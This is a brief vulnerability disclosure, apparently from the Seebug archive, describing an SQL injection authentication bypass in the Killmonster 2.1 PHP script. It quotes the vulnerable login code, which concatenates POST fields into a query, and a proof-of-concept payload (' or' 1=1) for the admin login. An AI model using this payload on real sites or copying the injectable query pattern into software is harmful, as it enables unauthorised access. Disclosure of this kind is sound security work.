[+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability [+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org> [+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/ [+] Vuln Code : [login.php] <form method="POST" action="authenticate.php"> Type Username Here: <input type="text" name="isadmin" size="15"><br> Type Password Here: <input type="password" name="password" size="15" mask="x"><br> <input type="submit" value="submit" name="submit"> [authenticate.php] $isadmin=$_POST['isadmin']; $password=$_POST['password']; $password=md5($password); $query = "select * from km_admins where username='$isadmin' and password='$password'"; $result = mysql_query($query) ; [+] PoC : [Killmonster_path]/admin/login.php username : ' or' 1=1 password : ' or' 1=1
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论